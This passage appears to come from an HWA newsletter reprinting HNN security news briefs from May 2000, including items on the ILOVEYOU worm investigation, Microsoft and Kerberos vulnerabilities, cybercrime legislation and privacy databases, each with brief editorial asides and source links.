Senator Fred Thompson (R-Tennessee) has introduced legislation that would require the federal government to conduct yearly checks of the security of its computer systems and force managers of those systems to prove they are secure. The Government Information Security Act was introduced at the Internet Defense Summit and was approved by the Government Affairs Committee on Tuesday.
Wired
http://www.wired.com/news/politics/0,1283,36223,00.html

@HWA

15.0 [HNN] May 10'00 Internet Fraud Complaint Center Launched By DoJ
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Evil Wench and acopalyse

Janet Reno has announced the creation of the Internet Fraud Complaint Center, a joint venture launched by the FBI and the National White Collar Crime Center. The new center will be aimed at providing better coordination among law enforcement agencies in tackling complaints of fraud on the Internet.

Government Executive Magazine
E Commerce Times
Internet Fraud Complaint Center
http://www.govexec.com/dailyfed/0500/050900b1.htm
http://www.ecommercetimes.com/news/articles2000/000509-3.shtml
https://www.ifccfbi.gov/

@HWA

16.0 [HNN] May 10'00 And Yet Another Hole Found In Hotmail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Apocalypse Dow

If a Hotmail user clicks on an attachment that contains a Javascript Trojan horse, an attacker can read, send, and delete messages from that person's account. Microsoft said that they would look into the issue and release a fix if needed.

Wired
http://www.wired.com/news/technology/0,1282,36241,00.html

@HWA

17.0 [HNN] May 11'00 Solar Sunrise, Now on Video
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by yeza

Solar Sunrise, the code name for what was once described as "the most organized and systematic attack the Pentagon has seen to date," is now out on video. A training tape produced by the National Infrastructure Protection Center is now available for $12.28 from FilmComm. But read the review first. (Our tax dollars hard at work making videos of a couple of punk kids.)
ZD Net - Scathing Solar Sunrise Review
FilmComm
http://www.zdnet.com/intweek/stories/columns/0,4164,2567361,00.html
http://www.filmcomm.com

@HWA

18.0 [HNN] May 11'00 Network Manager Sent to Jail For Destroying His Network
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by McIntyre

In the first federal criminal prosecution of computer sabotage, a network manager who spent ten and a half years building the network was found guilty of destroying what he had built. Tim Lloyd, 37, of Wilmington, Del., had deleted all the files that controlled the company's manufacturing process three weeks after he had been fired. Omega Engineering, a high-tech measurement and instrumentation manufacturer, has estimated that it lost more than $10 million. Mr. Lloyd could face at least five years in federal prison; sentencing has been scheduled for July 31.

The Industry Standard
http://www.thestandard.com/article/display/0,1151,14938,00.html

@HWA

19.0 [HNN] May 11'00 Lawmakers Upset Over ILOVEYOU
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Kevin

In a hearing on Wednesday the House Science Committee's panel on technology criticized the anti-virus industry for failing to protect the nation against the ILOVEYOU virus/worm. During the hearing Congressman Gutknecht said he was contemplating drafting a bill that would make it illegal for software companies to hire former hackers. Peter Tippett, chief scientist at Virginia-based computer security assurance firm ICSA.net, went so far as to suggest that the mere act of writing a virus should be made illegal. (And so the hysteria begins.)
Security Focus
http://www.securityfocus.com/news/32

@HWA

20.0 [HNN] May 11'00 Intel Motherboards Could Destroy Files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Code Kid

Intel has admitted that nearly one million motherboards that have shipped since November may have a defective 'memory translator hub' that could experience problems transferring data between the SDRAM and the Intel 820 chipset. Intel said that the defect could cause some systems to intermittently reset, reboot, hang or possibly corrupt data. The motherboards have been shipped to numerous suppliers, including Dell and Compaq, as well as third party manufacturers. Intel has said it will replace the defective parts but urges customers to contact their dealer.

Nando Times
C|Net
http://www.nandotimes.com/technology/story/body/0,1634,500202708-500280641-501498167-0,00.html
http://news.cnet.com/news/0-1006-201-1851632-0.html?tag

@HWA

21.0 [HNN] May 11'00 Hackers and the Tools They Use
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Crypt0pimP

So what should you get out of your $150,000 penetration test? Someone fresh out of school who knows how to run ISS and that is it? Or should you be getting a more thorough test of your network?

SunWorld
http://www.sunworld.com/sunworldonline/swol-05-2000/swol-05-security.html

@HWA

22.0 [HNN] May 11'00 HackerNews Brazil and SecureNet Forced To Remove Content
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by no

The web site http://www.hackernews.com.br and Secure Net, also based in Brazil, have been forced to remove their defaced page archives. Brazil's legal system decided that the defacement mirror archives hosted on the sites were an incentive to criminal activity and forced them to be removed.
Terra - Portuguese
http://www.terra.com.br/informatica/2000/05/09/021.htm

@HWA

23.0 [HNN] May 12'00 ILOVEYOU May Have Been An Accident
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

A Filipino computer student has admitted that he may have been the one who released the ILOVEYOU virus/worm, but that it was an accident. However, he would not admit to writing the virus. Investigators have said they want to talk with Onel A. de Guzman but declined to identify him as a suspect.

Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500203055-500281301-501504037-0,00.html

@HWA

24.0 [HNN] May 12'00 Windows Labeled 'Virus Friendly'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

Experts are criticizing Microsoft for making software that has features that few people want or need but that make it extremely easy for viruses to spread. Windows Scripting Host and Visual Basic are two of the features named that come standard with every installation and that assist, if not promote, the spread of malicious code.

The Industry Standard
http://www.thestandard.com/article/article_print/1,1153,15019,00.html

@HWA

25.0 [HNN] May 12'00 PBS Loses Subscriber Info
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by sean.o

The Public Broadcasting System based in Lewiston, Maine, suffered an electronic intrusion into its billing system. Officials have said that they do not know if any of the personal information, including names, phone numbers, addresses and credit card numbers of its 63,000 radio and television members, had even been looked at, let alone copied and downloaded. The station said that it is warning its members just in case.
Associated Press - San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/ap/docs/58851l.htm

@HWA

26.0 [HNN] May 12'00 Anonymous User Sues Yahoo For Releasing Identity
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Space Rogue

After having his identity revealed to AnswerThink Consulting, an anonymous user is suing Yahoo for not notifying him that his identity had been revealed. The civil suit charges Yahoo, Inc. with invasion of privacy, breach of contract, negligent misrepresentation, and unfair competition and false advertising. Yahoo revealed the names of several posters to an AnswerThink message board after being subpoenaed. The user, known as 'Aquacool_2000', is being supported by the ACLU and EPIC.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2567806,00.html

@HWA

27.0 [HNN] May 12'00 Smart Cards Labeled Secure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

On May 5th the National Institute of Standards and Technology issued a FIPS Pub 140-1 certification to the Spyrus Rosetta Smart Card. This is the first smart card to receive such certification. The certification makes this card eligible to participate in the GSA's $1 Billion government-wide smart card contract.

Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0508/web-fips-05-11-00.asp

@HWA

28.0 [HNN] May 12'00 Cyber Attackers on Television
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by PhantasmP

This Saturday (May 13th) America's Most Wanted is airing an episode about cyber terrorism. The write-up in the print edition of TV Guide is as follows: "Examining U.S. government efforts to stop criminal computer hackers, who can disrupt vital city services." The online edition says "Cyber-Criminals Special Edition: An overview of cyber terrorism includes easy targets; wide-ranging effects; and a profile of a dangerous hacker." The show is scheduled to air at 9pm EST on FOX Networks.

(Like this won't be full of FUD.)
TV Guide
America's Most Wanted
http://www.tvguide.com/listings/index.asp?view
http://www.amw.com/site/thisweek/index.html

@HWA

29.0 [HNN] May 15'00 Love Bug Suspect Denies All
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Brian

Michael Buen, who has been suspected of writing the ILOVEYOU virus/worm, has denied all involvement. "I should like to categorically state for the record that I have no involvement or participation whatsoever in the design, development, creation or dissemination of the 'ILOVEYOU' virus," Buen said in a statement.

Associated Press - San Jose Mercury News
ZD Net
http://www.mercurycenter.com/svtech/news/breaking/ap/docs/67301l.htm
http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2569390,00.html?chkpt

@HWA

30.0 [HNN] May 15'00 Microsoft Found to Be Threat to National Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Cult hero

A two-part essay that explains why Microsoft is bad for the country has been posted. The first part focuses on the serious security shortcomings of Windows while part 2 focuses on the laws the software industry has passed to protect themselves from any liability.

InfoWarrior
http://www.infowarrior.org/articles.html

Microsoft Criticism Mounts After Melissa

Microsoft had over a year to address security concerns about the tight integration of its email client with other parts of its operating system. Now system administrators are criticizing the company for letting the problem grow out of hand instead of attempting to minimize the potential threat.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2568904,00.html

@HWA

31.0 [HNN] May 15'00 G8 to Discuss Cybercrime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by evenprime

The Group of Eight (G8) will meet in Paris today for a three-day discussion about the increasing threat of online crime.
ZD Net
APB Online
BBC
http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2569395,00.html?chkpt
http://www.apbnews.com/newscenter/internetcrime/2000/05/14/netcrime0514_01.html
http://news.bbc.co.uk/hi/english/world/europe/newsid_748000/748597.stm

@HWA

32.0 [HNN] May 15'00 VA Described as Wide Open To Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

An internal memo circulating within the Veterans Administration has listed 18 different vulnerabilities in computer systems at the organization. VA computer security is said to be so weak that it continues to be a target for attack. The VA spends $1 Billion of taxpayers' money per year on computer systems.

Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0508/web-va-05-12-00.asp

@HWA

33.0 [HNN] May 15'00 Bank Web Site Breached
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by weknowu

The web site of the Saraswat co-operative bank in India was breached by a group of attackers who claimed they were testing its security. The attackers gained access to customer account information but were unable to initiate any online transactions. Bank officials have said that they have closed the security hole.

Times Of India
http://www.timesofindia.com/120500/12mpun3.htm

@HWA

34.0 [HNN] May 15'00 Koreans Host 'Hacking Contest'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

The Korea Advanced Institute of Science and Technology (KAIST) will hold an international hacking contest from June 27 to the 30th. A prize of $50,000 will be awarded to the top finisher, and $20,000 and $10,000 to the second- and third-place finishers, respectively.

(Another lame attempt at publicity; these contests do nothing to test security or gain information.)
Korea Herald
Korea Advanced Institute of Science and Technology
http://www.koreaherald.co.kr/news/2000/05/__10/20000515_1023.htm
http://www.kaist.ac.kr/edex.html

@HWA

35.0 [HNN] May 15'00 America's Most Wanted Hit with DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by sleestack

After lumping hackers in with murderers and serial rapists, the web site for America's Most Wanted became unreachable. Experts theorize that the site came under a heavy denial of service attack after airing a segment on cyber-crime which asked users to phone in tips on the recent attacks that hit Yahoo, CNN, and others.

Security Focus
America's Most Wanted
http://www.securityfocus.com/news/34
http://www.amw.com

@HWA

36.0 [HNN] May 15'00 Greising Responds
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by David

Chicago Tribune columnist David Greising published a scathing article on hackers last week that said we should all be locked up as criminals. This week he responds in a slightly calmer tone.

(At least he substituted the word cybervandal once in this week's column. Not much, but a start.)

Hackers Hardly Huggable; Let's Get Serious - May 7
Hackers weigh in, and are they ... uh ... hacked off - May 14

Mr. Greising included some carefully chosen statements out of the emails that he received for his article. HNN received a few of those same emails, which we publish here in their entirety.

Letters to David Greising
http://www.chicagotribune.com/business/columnists/greising/0,1122,SAV-0005070041,00.html
http://chicagotribune.com/business/columnists/greising/

@HWA

37.0 [HNN] May 17'00 Microsoft Security Spanked Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by turtlex

Microsoft Office 2000 ships with an ActiveX control named "Microsoft Office UA Control". Most users probably recognize it as the sickeningly friendly little paper clip character that makes annoying noises and faces at you while you work.
It is installed by default and is categorized as being "safe for scripting", which could allow an attacker to write a script that would let them do anything on the victim's computer, including deleting files.

ZD Net
Fairfax IT
@stake L0pht Labs - Advisory
Microsoft - Patch
http://www.zdnet.com/zdnn/stories/news/0,4586,2570727,00.html
http://www.it.fairfax.com.au/breaking/20000515/A62291-2000May15.html
http://www.l0pht.com/advisories/msoua.txt
http://www.microsoft.com/technet/security/bulletin/ms00-034.asp

@HWA

38.0 [HNN] May 17'00 Canada's Big Brother Revealed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by pyr8

Canada's federal Privacy Commissioner, Bruce Phillips, has revealed a massive computerized database that contains volumes of personal data on 33.7 million Canadians, living and dead. The database was started fifteen years ago by the Office of Employment and Immigration and is used to research and evaluate the effectiveness of the federal employment insurance program. The database contains information regarding tax returns, child tax benefits, provincial and municipal welfare files, federal jobs, job training and other information. There are proposals to expand the database to include additional data on social assistance recipients from provinces and territories, the Canada Student Loan Program, the Canada Pension Plan and the Old Age Security Program.

Ottawa Citizen
http://www.ottawacitizen.com/national/000517/4116449.html

@HWA

39.0 [HNN] May 17'00 Code on Disk Points Finger At Suspect
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

A disk taken from the home of Onel A. de Guzman contains a copy of a different virus that bears a striking resemblance to the ILOVEYOU virus/worm. According to the National Bureau of Investigation this new virus was written by Michael Buen. Mr. Buen has denied any and all involvement in the case.
Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/20000516/tc/computer_love_bug_74.html

@HWA

40.0 [HNN] May 17'00 List of ILOVEYOU Suspects Grows
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

Authorities are now looking at over 40 people as possible authors of the recent ILOVEYOU virus/worm. Most of the suspects are students at Manila's Amable Mendoza Aguiluz Computer College.

Industry Standard - via Yahoo
http://dailynews.yahoo.com/h/is/20000516/bs/list_of_love_bug_suspects_grows_1.html

@HWA

41.0 [HNN] May 17'00 Return of the Phreaker
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

This article uses a few scare tactics, but obviously when connecting telephone and network systems together it is imperative to ensure that adequate security controls are in place. Some experts theorize that soon phreakers will need to penetrate the Internet to access phone systems, a complete reversal of roles from when it was the computer underground that needed access to the phone systems to access computers.

Wired
http://www.wired.com/news/business/0,1367,36309,00.html

@HWA

42.0 [HNN] May 17'00 Hope 2000 Announces Plans
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Macki

HOPE 2000 has announced a mock DeCSS trial and that they are currently recruiting DJs and bands. They will soon announce the speaker list. In an interesting side development the real DeCSS trial date has been moved to the Monday after h2k.

HOPE 2000
http://www.h2k.net/

@HWA

43.0 [HNN] May 17'00 More and more E-zines
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Kynik

Issue 5 of the Napalm e-zine has been released, covering contemporary telenet, ethernet, music reviews, and various reader questions and comments. Forbidden Knowledge has released FK-11.
Napalm
Forbidden Knowledge - Official Distribution Site
http://napalm.firest0rm.org/
http://www.effkay.za.net

@HWA

44.0 [HNN] May 18'00 UCITA May Help Computer Attackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

The Uniform Computer Information Transactions Act (UCITA) has been accused of giving computer attackers backdoor access into computer systems. The law allows software manufacturers to install backdoors into their software so that they can control licensing agreements. Experts fear that these backdoors will be exploited by criminals who are looking to cause havoc.

BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_752000/752180.stm

@HWA

45.0 [HNN] May 18'00 H.R.3489 To Limit Eavesdropping
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by evenprime

The House Commerce Committee has voted to make it a crime to sell anything that can decode PCS cellular, pager traffic, or encrypted radio transmissions for the purposes of unauthorized interception. The ban was quietly attached to a tax harmonization bill as an amendment to the Communications Act of 1934. The bill, known as the Wireless Telecommunications Sourcing and Privacy Act, is expected to go before the Senate soon.

(Instead of fixing the protocol, let's just make it illegal.)

Wired
H.R.3489
http://www.wired.com/news/politics/0,1283,36401,00.html
http://thomas.loc.gov/cgi-bin/bdquery/z?d106:h.r.03489:

@HWA

46.0 [HNN] May 18'00 Congressional Record Reveals Officers' Social Security Numbers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Arik

Using public information found on military web sites, a New Jersey man has admitted that he created fake credit card accounts for some of the nation's highest-ranking military officers. Lamar Christian, of Trenton, N.J., said he got the information, including social security numbers, from a web site.
The owner of the web site says he got them from the Congressional Record, where the numbers used to be published when an officer was promoted. Christian is scheduled to be sentenced on August third and could face up to four years in jail.

Associated Press - via ABC News
http://abcnews.go.com/wire/US/ap20000517_684.html

@HWA

47.0 [HNN] May 18'00 G8 Finds No Quick Fix For Cyber Crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by root66

While meeting in Paris, the world's industrialized countries said they wanted faster and more specialized responses to online crime, but at the same time did not want to hurt online economic growth. The group stressed cooperation, not only between countries but between government, law enforcement, and corporations. They plan to meet again on the topic in July.

Reuters - via Wired
Associated Press - via USA Today
Industry Standard - via Yahoo
http://www.wired.com/news/politics/0,1283,36398,00.html
http://www.usatoday.com/life/cyber/tech/cth930.htm
http://dailynews.yahoo.com/h/is/20000517/bs/group_unveils_net-security_recommendations_1.html

@HWA

48.0 [HNN] May 18'00 Philippines Has No CyberCrime Law - Suspect Can Not be Prosecuted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by root66

A senior Department of Justice official has said that the access control device law will not apply in the ILOVEYOU virus/worm case. This severely hampers the investigation and it is unknown what direction it will take next.

(If no crime has been committed then why are they wasting resources looking for the perpetrator?)
Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/20000517/tc/computer_love_bug_76.html

@HWA

49.0 [HNN] May 18'00 Multiple Holes Found in Kerberos
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

The Computer Emergency Response Team at Carnegie Mellon has issued an advisory warning users of several buffer overflow conditions that exist in the Kerberos authentication system. These holes could allow an intruder root access to a system and affect both versions 4 and 5.

CERT
http://www.cert.org/advisories/CA-2000-06.html

@HWA

50.0 [HNN] May 18'00 Interview with OpenBSD Creator
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

An interview with the creator of OpenBSD, the only operating system that is constantly scoured for security flaws, has been posted to Upside. Theo de Raadt, the open source project's leader, has some interesting things to say about his project and the world around him.

Upside
Open BSD
http://www.upside.com/Open_Season/3921a9080.html
http://www.openbsd.org

@HWA

51.0 [HNN] May 18'00 RIAA Looking For Targets
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Troy

The RIAA has filed a lawsuit against SuperPimp Software, a small shareware developer of news reading software. No, they aren't infringing on copyrights themselves; they just happen to produce software that could potentially be used to infringe on others' copyrights. The issue is the article attachment decoder, which could be used to decode copyrighted mp3s found in news groups.

(Glad someone is fighting them.)

Super Pimp Software
http://www.superpimp.org

@HWA

52.0 [HNN] May 18'00 Canadian BB DB Clippings
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Adam

Yesterday we reported on the massive database Canada keeps on its citizens that was recently discovered. Today government officials are trying to minimize the damage.
Globe and Mail

"Human Resources Minister Jane Stewart said she saw nothing wrong with collecting vast amounts of information on Canadians in centralized databanks, noting that it has been done since 1985."

National Post

"Anne McLellan, the Justice Minister, yesterday said her officials will review outdated federal privacy legislation after a respected watchdog revealed that the government has created a computer database that puts the privacy of millions of Canadians at risk."

"Ms. Stewart said the information in the computer database is safe because it is "encrypted," but then told the Commons that six unidentified HRDC employees have access to unencrypted information in the database."

Toronto News
Ottawa News
http://www.globeandmail.com/gam/National/20000517/UPRIVN.html
http://www.nationalpost.com/news.asp?f
http://www.canoe.ca/TorontoNews/ts.ts-05-18-0015.html
http://www.canoe.ca/OttawaNews/OS.OS-05-17-0008.html

@HWA

53.0 [HNN] May 19'00 NewLove - Dangerous Variant on the Loose
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by altomo

One of the over 40 variants of ILOVEYOU has the potential to be a serious threat to computer users. The 'New Love' worm is still sent as an attachment that a user must click on, but now it deletes all files on a hard drive and mapped network drives. In addition, it randomly alters itself, making it polymorphic and harder to defend against. The worm was first discovered in Israel and is thought to have come from someplace in Europe. So far it has infected only a few systems in Europe and California. All of the major anti-virus companies have added 'New Love' to their definition files.
Associated Press - via Yahoo
ZD Net
ABC
C|Net
Symantec
F-Secure
McAfee
Sophos
http://dailynews.yahoo.com/h/ap/20000519/tc/new_love_bug_4.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2572454,00.html
http://abcnews.go.com/sections/tech/dailynews/virus000519.html
http://news.cnet.com/news/0-1005-200-1899852.html?tag
http://www.symantec.com
http://www.f-secure.com
http://www.mcafee.com
http://www.sophos.com

@HWA

54.0 [HNN] May 19'00 Old CIA Head Warns of Spy-Viruses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by aleph1

Former CIA director R. James Woolsey has warned that new threats will come in the form of 'instructive' viruses as opposed to destructive ones. Unlike Melissa, ILOVEYOU, CIH, and others, this new breed of viruses would use covert techniques to gather sensitive data and return it to international spies and terrorists.

Security Focus
http://www.securityfocus.com/news/38

@HWA

55.0 [HNN] May 19'00 Fed Slow In Virus Reaction
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

Experts in government information systems told members of the General Accounting Office that the government was slow in reacting to ILOVEYOU. They said that government agencies were not given enough time to respond to the crisis, which resulted in substantial damage to government systems and information.

Associated Press - via Excite
http://news.excite.com/news/ap/000518/16/love-bug-impact

@HWA

56.0 [HNN] May 19'00 FCC's Attempted Expansion of CALEA In Court
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by JavaJ

The U.S. Court of Appeals in Washington is hearing arguments over the rules issued last year by the Federal Communications Commission detailing how telecommunications companies must comply with the Communications Assistance for Law Enforcement Act (CALEA), passed by Congress in 1994.
The FCC mandated that telephone lines must be compatible with surveillance equipment, that cell phones be traceable along with post-dialing digits (account numbers, voice mail passwords, etc.), and that packet-mode communications or Internet traffic be tappable. The FCC mandated that all of this information would be turned over simply for the asking, with no warrant involved. The Center for Democracy and Technology is arguing that the FCC overstepped its bounds and that the FCC rules are in fact unconstitutional.

MSNBC - via ZD Net
Center For Democracy and Technology
http://www.zdnet.com/zdnn/stories/news/0,4586,2570897,00.html?chkpt
http://www.cdt.org/

@HWA

57.0 [HNN] May 19'00 Russian Computer Crime on the Rise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

Vitaly Degterev, first deputy chief of the Interior Ministry's department on high-tech crimes, was quoted by the ITAR-TASS news agency as saying that there was more Russian cyber crime in the first three months of 2000 than in all of 1999. From January to March of 2000 over 200 cases of computer attacks had been reported; in all of 1999 there were only 80 cases.

Associated Press
http://cnn.com/2000/TECH/computing/05/17/russia.hackers.ap/index.html

@HWA

58.0 [HNN] May 19'00 J0n Pleads Guilty in Canada
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by root66

A teenager from Canada, known online as J0n, has pleaded guilty in a Montreal court to charges of defacing a NASA web page and of penetrating the systems of several Canadian and foreign institutions including Harvard and MIT. Following the surprise plea the judge handed down the maximum sentence of 240 hours of community work plus one year's probation and restricted use of a computer, and ordered the defendant to deliver a speech at a local high school on the evils of hacking.
NewsBytes - via USA Today
http://www.usatoday.com/life/cyber/nb/nb3.htm

@HWA

59.0 [HNN] May 19'00 Electronically Attacking a Bank
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Sangfroid

Think your local neighborhood bank is safe from cyber attack? Think again. David H. Freedman has published a step-by-step guide to one way to break into a bank and siphon off 10 to 100 million bucks. Do you work at a bank? Better read this.

Forbes
http://www.forbes.com/asap/00/0403/056.htm

@HWA

60.0 [HNN] May 22'00 NAI Removes NetBus Pro from Scanner
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Judd

NetBus Pro 2.10, a remote administration tool by UltraAccess.net, has been removed from the McAfee VirusScan software by Network Associates. NAI's change in attitude toward NetBus Pro 2.10 was not the result of back room negotiations, but rather came upon the advice of McAfee's own legal counsel. Upon learning this, UltraAccess has been in communication with several other AV vendors, who also have agreed to remove detection of NetBus Pro. Information will be released as it develops.

UltraAccess.net
http://www.netbuspro.com

@HWA

61.0 [HNN] May 22'00 Brits Lose Another Laptop
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

A British intelligence officer had his laptop stolen after he put it down at a London railway station. Officials say that the laptop did not contain classified information, but unconfirmed reports indicate that it did have specifications for the next generation of fighter aircraft and details of how they can be controlled from the ground. This is the second laptop stolen from Paddington Station in as many months and follows several other recent thefts.
The Times UK
http://www.the-times.co.uk/news/pages/sti/2000/05/21/stinwenws01039.html

@HWA

62.0 [HNN] May 22'00 State Department Audits Missing Laptops
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

The State Department has discovered that 15 of its 1,913 unclassified laptops have been either stolen or misplaced in the last 18 months. The survey, conducted by the department's Bureau of Diplomatic Security, found only one missing classified laptop out of 60.

Washington Post
http://washingtonpost.com/wp-dyn/articles/A23562-2000May17.html

@HWA

63.0 [HNN] May 22'00 Researchers Develop New Breed of Security Tool
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

This press release is a little short on the technical details, but it would appear that researchers at the Department of Energy's Sandia National Laboratories have built a Heuristic Distributed Security Agent. The agent is supposedly able to match incoming threats against its fingerprint database but also to learn and distinguish new threats on the fly. Researchers say that an initial release to sensitive government systems will happen within a year and to the civilian market within three years.

EurekAlert
http://www.eurekalert.org/releases/snl-chs051800.html

@HWA

64.0 [HNN] May 22'00 Original ILOVEYOU Author Surfaces in Australia
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by tall.drink

The Australian who brought down the Australian Republican Movement's telecommunications system has told the media that he may have been the one who wrote the original worm upon which the world's latest email virus, ILOVEYOU, is based. Valiant wants to make it clear that someone else added the malicious payload.

(Sorta seems like a publicity stunt to promote his company.)
Sydney Morning Herald
Wired
http://www.smh.com.au/news/0005/22/pageone/pageone15.html
http://www.wired.com/news/technology/0,1282,36477,00.html

@HWA

65.0 [HNN] May 23'00 Secret Searches Reintroduced to Congress
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by JavaJ

The Center for Democracy and Technology has sent out a warning regarding several bills currently before Congress that contain suspicious wording that could be interpreted to violate the Fourth Amendment. The language brings back the 'secret search' provisions of the Cyberspace Electronic Security Act that were tossed out after the draft was leaked to the press. Now secret searches are being reintroduced into several bills as small, little-noticed amendments. The time to act is now.

CDT Warning
Center for Democracy and Technology
http://www.cdt.org

@HWA

66.0 [HNN] May 23'00 FTC Wants Control Over Privacy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

The Federal Trade Commission has asked Congress for authority to regulate how companies use personal information collected on their Web sites. After concluding the industry failed to safeguard consumer privacy through self-regulation, the commission recommended that lawmakers pass legislation to bolster its ability to oversee online privacy.

Nando Times
ZD Net

House Republicans think the FTC's move may be nothing more than election year politics.

Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500207162-500289092-501566171-0,00.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2574082,00.html
http://www.nandotimes.com/technology/story/body/0,1634,500206866-500288569-501560300-0,00.html

@HWA

67.0 [HNN] May 23'00 Computer Attackers To get Even Higher Sentences
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by acopalyse

At a conference on critical infrastructure protection Sens. John Kyl, R-Ariz., and Dianne Feinstein, D-Calif.,
